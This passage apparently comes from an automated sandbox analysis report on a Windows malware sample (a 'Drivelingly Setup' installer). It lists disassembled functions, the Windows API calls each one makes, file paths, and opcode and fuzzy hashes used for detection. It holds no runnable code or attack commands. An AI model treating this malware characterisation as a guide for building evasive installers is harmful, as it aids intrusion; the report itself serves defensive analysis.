                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: dc959893e0748e5b93c2d0ca3b5ec6abaee85400367ba77a9cf45422cd82545c
                                                                        • Instruction ID: b48363985cd602751ae38a2791165fd5af0714f22da7c63f7ced5d0d9316473d
                                                                        • Opcode Fuzzy Hash: dc959893e0748e5b93c2d0ca3b5ec6abaee85400367ba77a9cf45422cd82545c
                                                                        • Instruction Fuzzy Hash: 6EF0A072608144AAD710EBA49A49AEEB7689F51324F60447BF142B20C1D6B849459B3A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406AA8 Relevance: .3, Instructions: 334COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                        • Instruction ID: c3f2784b42629965e79a9deb6a6c5a882cbc70a40949ec996fd179ba06f8b65e
                                                                        • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                        • Instruction Fuzzy Hash: EBE1BB71904719DFDB24CF58C880BAAB7F1FB45305F11852EE497A72C1E738AA91CB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040727F Relevance: .3, Instructions: 300COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                        • Instruction ID: 973a31ab38dbc5c4480f1d9ea431a22b3101bf508bc4e87126308f85d1407ce0
                                                                        • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                        • Instruction Fuzzy Hash: 03C13631E042199BCF18CF68D8905EEBBB2FF89314F25866AD85677380D734A942CB95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404CD9 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 491windowmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404CF0
                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404CFD
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D4C
                                                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D63
                                                                        • SetWindowLongA.USER32(?,000000FC,004052EC), ref: 00404D7D
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8F
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA3
                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404DB9
                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404DC5
                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DD5
                                                                        • DeleteObject.GDI32(00000110), ref: 00404DDA
                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404E05
                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404E11
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EAB
                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EDB
                                                                          • Part of subcall function 00404309: SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EEF
                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404F1D
                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F2B
                                                                        • ShowWindow.USER32(?,00000005), ref: 00404F3B
                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00405036
                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040509B
                                                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004050B0
                                                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050D4
                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050F4
                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00405109
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405119
                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405192
                                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 0040523B
                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 0040524A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405275
                                                                        • ShowWindow.USER32(?,00000000), ref: 004052C3
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 004052CE
                                                                        • ShowWindow.USER32(00000000), ref: 004052D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N$Y,J
                                                                        • API String ID: 2564846305-2766381414
                                                                        • Opcode ID: ca7dbb6a503788cd47dbf5d08f4323d521cbc5f7f974eef513618351bc7c7494
                                                                        • Instruction ID: c814a1149ae8d70461ce7ac85806320f31a4e43cf09a070d2a5393f0519b6fc2
                                                                        • Opcode Fuzzy Hash: ca7dbb6a503788cd47dbf5d08f4323d521cbc5f7f974eef513618351bc7c7494
                                                                        • Instruction Fuzzy Hash: 1E026AB0A00209AFDB20DF64CD45AAE7BB5FB44354F54817AFA10BA2E0C7788D52DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040443F Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 202windowstringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004044CA
                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 004044DE
                                                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044FC
                                                                        • GetSysColor.USER32(?), ref: 0040450D
                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040451C
                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040452B
                                                                        • lstrlenA.KERNEL32(?), ref: 0040452E
                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040453D
                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404552
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 004045B4
                                                                        • SendMessageA.USER32(00000000), ref: 004045B7
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 004045E2
                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404622
                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00404631
                                                                        • SetCursor.USER32(00000000), ref: 0040463A
                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 00404650
                                                                        • SetCursor.USER32(00000000), ref: 00404653
                                                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040467F
                                                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404693
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                        • String ID: D@$ExecToStack$N$Y,J
                                                                        • API String ID: 3103080414-3982796002
                                                                        • Opcode ID: 35ee71d5250129fbf2f36168019ba60c9b2f338ba1f9cfece2971a749f388ba2
                                                                        • Instruction ID: ec86402776fd01095bc4262357a67ddb6d4548b01b5252dde79e8ca7eec82ec2
                                                                        • Opcode Fuzzy Hash: 35ee71d5250129fbf2f36168019ba60c9b2f338ba1f9cfece2971a749f388ba2
                                                                        • Instruction Fuzzy Hash: 0761A2B1A00209BBDB10AF61DC45B6A3B68EB84754F10443AFB04BB1D1D7B9A9618F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextA.USER32(00000000,Drivelingly Setup,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: Drivelingly Setup$F
                                                                        • API String ID: 941294808-2226598432
                                                                        • Opcode ID: 2271267dbcbb5a429a5c45712c2942ab76dd5bcbd32f73574c3dae7e133f94db
                                                                        • Instruction ID: 1fbfacec2506b2ab202253b0e42594ede9e170c8a1cf430301d1f688d6e441df
                                                                        • Opcode Fuzzy Hash: 2271267dbcbb5a429a5c45712c2942ab76dd5bcbd32f73574c3dae7e133f94db
                                                                        • Instruction Fuzzy Hash: AA417D71800209AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74E955DFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 6EAC19A3 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 80processstringsynchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCommandLineA.KERNEL32(00000400), ref: 6EAC19D4
                                                                        • lstrcpynA.KERNEL32(?,00000000), ref: 6EAC19E2
                                                                        • CharNextA.USER32(00000022), ref: 6EAC1A0F
                                                                        • CharNextA.USER32(00000022), ref: 6EAC1A18
                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6EAC1A39
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6EAC1A4B
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 6EAC1A58
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC1A67
                                                                        • CloseHandle.KERNEL32(?), ref: 6EAC1A6C
                                                                        • ExitProcess.KERNEL32 ref: 6EAC1A71
                                                                        • ExitProcess.KERNEL32 ref: 6EAC1A7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1379662989.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1379640466.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379684801.000000006EAC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379750126.000000006EAC3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1379781257.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_6eac0000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                                        • String ID: "$"$D
                                                                        • API String ID: 3771911414-3923985841
                                                                        • Opcode ID: 62f31717705739ca07c70a6a5bb18a4ef16f804e6e2bb29ecdec9fe8b86bb9d6
                                                                        • Instruction ID: 17b764f1f35a95c28e9ee24561daafd4909a17cfaf236233415f52d3ef9a58fe
                                                                        • Opcode Fuzzy Hash: 62f31717705739ca07c70a6a5bb18a4ef16f804e6e2bb29ecdec9fe8b86bb9d6
                                                                        • Instruction Fuzzy Hash: 182160B1904A4CBFEF119BE4CC58AEEBFB9AB06700F409062E241B7051C6705D8ACBB5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405EC0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406051,?,?), ref: 00405EF1
                                                                        • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405EFA
                                                                          • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5F
                                                                          • Part of subcall function 00405D4F: lstrlenA.KERNEL32(00000000,?,00000000,00405FAA,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D91
                                                                        • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405F17
                                                                        • wsprintfA.USER32 ref: 00405F35
                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405F70
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7F
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB7
                                                                        • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 0040600D
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040601E
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406025
                                                                          • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                          • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                        • String ID: %s=%s$[Rename]
                                                                        • API String ID: 2171350718-1727408572
                                                                        • Opcode ID: a6f8535865e152dd70a19ec5118f58b7e289ee706de500976c435fcd53071054
                                                                        • Instruction ID: 8908439cc2d3cfcd996604707d180e10d826c6d0da91f503aeabb4e5616cbf2a
                                                                        • Opcode Fuzzy Hash: a6f8535865e152dd70a19ec5118f58b7e289ee706de500976c435fcd53071054
                                                                        • Instruction Fuzzy Hash: 1531E731640B16ABC2207B65AD48F5B3A9CDF45758F14043BFA42F62D2DB7CD8118AAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406535 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharNextA.USER32(0000000B,*?|<>/":,00000000,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040658D
                                                                        • CharNextA.USER32(0000000B,0000000B,0000000B,00000000,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659A
                                                                        • CharNextA.USER32(0000000B,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659F
                                                                        • CharPrevA.USER32(0000000B,0000000B,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004065AF
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406536
                                                                        • *?|<>/":, xrefs: 0040657D
                                                                        • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe", xrefs: 00406535
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-1756098048
                                                                        • Opcode ID: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                                        • Instruction ID: f1a46c244338e9c327de57877a99ef2f1f2ce6c7380876dc27bda46ebf0462ee
                                                                        • Opcode Fuzzy Hash: 28daa348592e837642e08a63fb50167dd7553375ed6c1e47afa6a3256008987e
                                                                        • Instruction Fuzzy Hash: 671134918047903DFB3216386C04B776FC94F9B760F5A007BE4C2722CAC63C5CA6826D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040433B Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 00404358
                                                                        • GetSysColor.USER32(00000000), ref: 00404396
                                                                        • SetTextColor.GDI32(?,00000000), ref: 004043A2
                                                                        • SetBkMode.GDI32(?,?), ref: 004043AE
                                                                        • GetSysColor.USER32(?), ref: 004043C1
                                                                        • SetBkColor.GDI32(?,?), ref: 004043D1
                                                                        • DeleteObject.GDI32(?), ref: 004043EB
                                                                        • CreateBrushIndirect.GDI32(?), ref: 004043F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: d8b0c4ae085d5752a0ceb3fd9c96bfdfa4daadee6b5f884e1a531c3ceae13210
